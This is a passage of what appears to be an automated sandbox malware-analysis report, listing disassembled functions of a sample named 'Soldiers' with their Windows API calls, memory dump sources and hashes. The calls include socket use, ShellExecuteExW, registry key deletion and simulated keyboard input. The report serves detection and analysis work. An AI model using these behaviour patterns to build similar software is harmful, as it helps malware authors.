                                                          • SendMessageW.USER32(?,00000142,00000000,00000000,?,?,0096964F,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 009668D6
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                          • String ID:
                                                          • API String ID: 3864802216-0
                                                          • Opcode ID: 7fa5812ac9e072a921d371331a04901cdfadc00c2160a3feba613b957cf8a7f0
                                                          • Instruction ID: 46d30a862c796e250eda5386b06a0c06b486ddac6681654848d9cff1ecd325d8
                                                          • Opcode Fuzzy Hash: 7fa5812ac9e072a921d371331a04901cdfadc00c2160a3feba613b957cf8a7f0
                                                          • Instruction Fuzzy Hash: 9A318D72215210BFEB108F10CC4AFEB3BADEB89765F040051FE089A291C6759891CB74
                                                          Function 0093C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: 86b07edc56e100ee456502874f454728adb8c01d92001ca6dd641281a55db25b
                                                          • Instruction ID: 3238a990d5e521e1f07ceaeab471484286d0fd2bf1df68c6b8f6d3aa73916580
                                                          • Opcode Fuzzy Hash: 86b07edc56e100ee456502874f454728adb8c01d92001ca6dd641281a55db25b
                                                          • Instruction Fuzzy Hash: 6B21D4F3701E057AD60475218D82FBB376D9EA1788F088020FD4BB6283EB11DE619FA1
                                                          Function 0094F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E4D37: __itow.LIBCMT ref: 008E4D62
                                                            • Part of subcall function 008E4D37: __swprintf.LIBCMT ref: 008E4DAC
                                                            • Part of subcall function 008F436A: _wcscpy.LIBCMT ref: 008F438D
                                                          • _wcstok.LIBCMT ref: 0094F2D7
                                                          • _wcscpy.LIBCMT ref: 0094F366
                                                          • _memset.LIBCMT ref: 0094F399
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                          • String ID: X
                                                          • API String ID: 774024439-3081909835
                                                          • Opcode ID: 30c157961ba2a404ce6afff778d4e78eb49b890f6d1b6b3e5c859e73503ad04f
                                                          • Instruction ID: 85631b6e6452e1c4bf43e3f2f86ec7c0b178e8f0299a089e1cc516451a25833f
                                                          • Opcode Fuzzy Hash: 30c157961ba2a404ce6afff778d4e78eb49b890f6d1b6b3e5c859e73503ad04f
                                                          • Instruction Fuzzy Hash: 01C189716087419FD724EF68C895E6AB7E4FF85354F00492DF999C72A2DB30E805CB82
                                                          Function 009571EE Relevance: 10.8, APIs: 7, Instructions: 250COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #151.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 009572EB
                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0095730C
                                                          • #111.WSOCK32(00000000), ref: 0095731F
                                                          • #15.WSOCK32(?,?,?,00000000,?), ref: 009573D5
                                                          • #11.WSOCK32(?), ref: 00957392
                                                            • Part of subcall function 0093B4EA: _strlen.LIBCMT ref: 0093B4F4
                                                            • Part of subcall function 0093B4EA: _memmove.LIBCMT ref: 0093B516
                                                          • _strlen.LIBCMT ref: 0095742F
                                                          • _memmove.LIBCMT ref: 00957498
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _memmove_strlen$#111#151
                                                          • String ID:
                                                          • API String ID: 2620998920-0
                                                          • Opcode ID: b650176186764a1cb4e33ab5ac34d17346bbedece3237872ceef3eb58c41a755
                                                          • Instruction ID: b1add156e8c39b5a8f6ed5f3108e8c9b06e3984ce32fadb93deb031051fa1d36
                                                          • Opcode Fuzzy Hash: b650176186764a1cb4e33ab5ac34d17346bbedece3237872ceef3eb58c41a755
                                                          • Instruction Fuzzy Hash: BD81C171208200ABC710EF6ADC85F6BB7A9FF85714F10491CFA559B2A2DB70DE45CB92
                                                          Function 008E1800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 26046d764feefb0dafecec65cbb0d9065aca17a268aed0335696303d47f15f28
                                                          • Instruction ID: 5e4e4c9c048819e6b80a3f5b7fe490eb5600a61151bf72df24a5ea00756dab57
                                                          • Opcode Fuzzy Hash: 26046d764feefb0dafecec65cbb0d9065aca17a268aed0335696303d47f15f28
                                                          • Instruction Fuzzy Hash: 03716B31904159EFCF04DF99CC88EEEBBB9FF86314F148159F915AA251C730AA91DBA0
                                                          Function 0096B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindow.USER32(?), ref: 0096BA5D
                                                          • IsWindowEnabled.USER32(?), ref: 0096BA69
                                                          • SendMessageW.USER32(00000000,0000041C,00000000,00000000,?,?,?,?,?,00000000), ref: 0096BB4D
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0096BB84
                                                          • IsDlgButtonChecked.USER32(?,?,?,?), ref: 0096BBC1
                                                          • GetWindowLongW.USER32(?,000000EC,?,?,?), ref: 0096BBE3
                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0096BBFB
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                          • String ID:
                                                          • API String ID: 4072528602-0
                                                          • Opcode ID: 7e37c194de636d3cd93e10dc4b9fac2862d57c9aff7ec06a433dfa775ec73029
                                                          • Instruction ID: 18d4b75154fa1ed50a3d097d327b79418ff69f7f8cdd8cf91f0e9f03bf19fe13
                                                          • Opcode Fuzzy Hash: 7e37c194de636d3cd93e10dc4b9fac2862d57c9aff7ec06a433dfa775ec73029
                                                          • Instruction Fuzzy Hash: 4F719F34604204AFDB249FA4C895FBAB7F9EF4A300F144459E956D72A1E731AD90EB60
                                                          Function 0095FB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 0095FB31
                                                          • _memset.LIBCMT ref: 0095FBFA
                                                          • ShellExecuteExW.SHELL32(?), ref: 0095FC3F
                                                            • Part of subcall function 008E4D37: __itow.LIBCMT ref: 008E4D62
                                                            • Part of subcall function 008E4D37: __swprintf.LIBCMT ref: 008E4DAC
                                                            • Part of subcall function 008F436A: _wcscpy.LIBCMT ref: 008F438D
                                                          • GetProcessId.KERNEL32(00000000), ref: 0095FCB6
                                                          • CloseHandle.KERNEL32(00000000), ref: 0095FCE5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                          • String ID: @
                                                          • API String ID: 3522835683-2766056989
                                                          • Opcode ID: 99d33035cf627f84b5a3a7c551630413545016155ec0ff6a2afae29920402b4b
                                                          • Instruction ID: c995c36974cab9e780316ca01fb16fdd419e43728f470f21c7df41858fb09e0b
                                                          • Opcode Fuzzy Hash: 99d33035cf627f84b5a3a7c551630413545016155ec0ff6a2afae29920402b4b
                                                          • Instruction Fuzzy Hash: 9061C175A00619DFCB14EFA9C8909AEB7F5FF49320F108469E84AAB351CB30AD45CF91
                                                          Function 0094174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetParent.USER32(?,?,?,00000011), ref: 0094178B
                                                          • GetKeyboardState.USER32(?), ref: 009417A0
                                                          • SetKeyboardState.USER32(?), ref: 00941801
                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0094182F
                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0094184E
                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00941894
                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009418B7
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 5be583a5846f740b95e5644a43ffa27aa73e22ac25c55c454a7d52bd3deff1c0
                                                          • Instruction ID: 264228749804038450d0db208fa9c1689876570bff00845a05706cb00ebf5315
                                                          • Opcode Fuzzy Hash: 5be583a5846f740b95e5644a43ffa27aa73e22ac25c55c454a7d52bd3deff1c0
                                                          • Instruction Fuzzy Hash: 8C51E1A0A187D53EFB368234CC55FBABEED6B46300F0C8989E1D9469D2D398ACC4D750
                                                          Function 00941565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetParent.USER32(00000000,00000000,00000000), ref: 009415A4
                                                          • GetKeyboardState.USER32(?), ref: 009415B9
                                                          • SetKeyboardState.USER32(?), ref: 0094161A
                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00941646
                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00941663
                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009416A7
                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009416C8
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: c868954bae9ec76ee8b4d4728f4f9c7d85fa75da852a9ba3e75f8bc84559d96b
                                                          • Instruction ID: d7f18d53fed6f5305dac9a68f082654e66470905295088608864fec5c6cab9bc
                                                          • Opcode Fuzzy Hash: c868954bae9ec76ee8b4d4728f4f9c7d85fa75da852a9ba3e75f8bc84559d96b
                                                          • Instruction Fuzzy Hash: AA5103A0A587D53DFB328724CC55FBABEAD6B46300F0C8589F1D94A8C2D694ECD8E750
                                                          Function 00945BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _wcsncpy$LocalTime
                                                          • String ID:
                                                          • API String ID: 2945705084-0
                                                          • Opcode ID: 6a7bd6988a8a96949794a591493823fae140cc9be485b2e6e05a36eef99774ca
                                                          • Instruction ID: 9eb6511bf2d42c653df9ad38c32dd5f444e81eac87bec414337d436563bef51a
                                                          • Opcode Fuzzy Hash: 6a7bd6988a8a96949794a591493823fae140cc9be485b2e6e05a36eef99774ca
                                                          • Instruction Fuzzy Hash: 1D41B3A6C506187ACB11EBF4CC8AACFB3BD9F44310F518856F519E3192E634A319C7A5
                                                          Function 00943B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00944BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00943B8A,?), ref: 00944BE0
                                                            • Part of subcall function 00944BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00943B8A,?), ref: 00944BF9
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00943BAA
                                                          • _wcscmp.LIBCMT ref: 00943BC6
                                                          • MoveFileW.KERNEL32(?,?), ref: 00943BDE
                                                          • _wcscat.LIBCMT ref: 00943C26
                                                          • SHFileOperationW.SHELL32(?), ref: 00943C92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 1377345388-1173974218
                                                          • Opcode ID: bec58ffc45c9a398e0923865ec02db9fbb620d2cfb40633fd1f836822912856a
                                                          • Instruction ID: e7c0760d90163eccac0064985ff9d43d9bbac6dd4ca2c34d9290eff70b4f147e
                                                          • Opcode Fuzzy Hash: bec58ffc45c9a398e0923865ec02db9fbb620d2cfb40633fd1f836822912856a
                                                          • Instruction Fuzzy Hash: 3A41387250C344AAC752EB74C485FEBB7ECEF89340F50596EB48AC3191EA34D6888752
                                                          Function 009678B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 009678CF
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00967976
                                                          • IsMenu.USER32(?), ref: 0096798E
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009679D6
                                                          • DrawMenuBar.USER32 ref: 009679E9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                          • String ID: 0
                                                          • API String ID: 3866635326-4108050209
                                                          • Opcode ID: 4ffeb0cb9536dae3a6d67c489ac073d6294f3052ced304f9ac100d428911b6f4
                                                          • Instruction ID: 2f0e4c08b991fb7629ee9bc6318e795551bf6b07cefa40dc078eeb77b8fe2bfe
                                                          • Opcode Fuzzy Hash: 4ffeb0cb9536dae3a6d67c489ac073d6294f3052ced304f9ac100d428911b6f4
                                                          • Instruction Fuzzy Hash: 63418B71A08208EFDB20CFA4D884EAABBF9FF05314F048529F95597250D738AD40DFA1
                                                          Function 00961602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00961631
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096165B
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00961712
                                                            • Part of subcall function 00961602: RegCloseKey.ADVAPI32(?), ref: 00961678
                                                            • Part of subcall function 00961602: FreeLibrary.KERNEL32(?), ref: 009616CA
                                                            • Part of subcall function 00961602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 009616ED
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 009616B5
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                          • String ID:
                                                          • API String ID: 395352322-0
                                                          • Opcode ID: d3b66d952420bb5c04a2aa30db263898df72c8ac1daea8f73953e5b6b908fa1b
                                                          • Instruction ID: 6319c6a8ee1b849f3122678cc0544af9acd387cf0020e16247f9bde6a3e5686c
                                                          • Opcode Fuzzy Hash: d3b66d952420bb5c04a2aa30db263898df72c8ac1daea8f73953e5b6b908fa1b
                                                          • Instruction Fuzzy Hash: 74314BB1910109BFDB14CF90DC89EFEB7BCEF08351F080169E505E2150EA749E85ABA0
                                                          Function 009668F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000,?,?,?,0096A461,?,?,?,?,?), ref: 00966911
                                                          • GetWindowLongW.USER32(?,000000F0,?,?,?,0096A461,?,?,?,?,?), ref: 00966944
                                                          • GetWindowLongW.USER32(?,000000F0,00000000,?,?,?,0096A461,?,?,?,?,?), ref: 00966979
                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000,00000000,?,?,?,0096A461,?,?,?,?,?), ref: 009669AB
                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000,?,?,?,0096A461,?,?,?,?), ref: 009669D5
                                                          • GetWindowLongW.USER32(?,000000F0,?,?,?,0096A461,?,?,?,?), ref: 009669E6
                                                          • SetWindowLongW.USER32(?,000000F0,00000000,?,?,?,0096A461,?,?,?,?), ref: 00966A00
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$MessageSend
                                                          • String ID:
                                                          • API String ID: 2178440468-0
                                                          • Opcode ID: 7a1fbdd81bf73e464d7d280f8a29e16b6ae31181401c859a7ab9edbba07b7c7f
                                                          • Instruction ID: 5e395251e7d1555ea402208a7f8645972a8d28cb6101fa1b53e009f07b21bd78
                                                          • Opcode Fuzzy Hash: 7a1fbdd81bf73e464d7d280f8a29e16b6ae31181401c859a7ab9edbba07b7c7f
                                                          • Instruction Fuzzy Hash: 45312631618150AFDB21CF59DC89F6577E9FB8A754F1902A4F9188F2B1CB71AC80EB90
                                                          Function 0093E287 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0093E2CA
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0093E2F0
                                                          • #2.WSOCK32(00000000), ref: 0093E2F3
                                                          • #2.WSOCK32(?), ref: 0093E311
                                                          • #6.OLEAUT32(?), ref: 0093E31A
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0093E33F
                                                          • #2.WSOCK32(?), ref: 0093E34D
                                                          Memory Dump Source
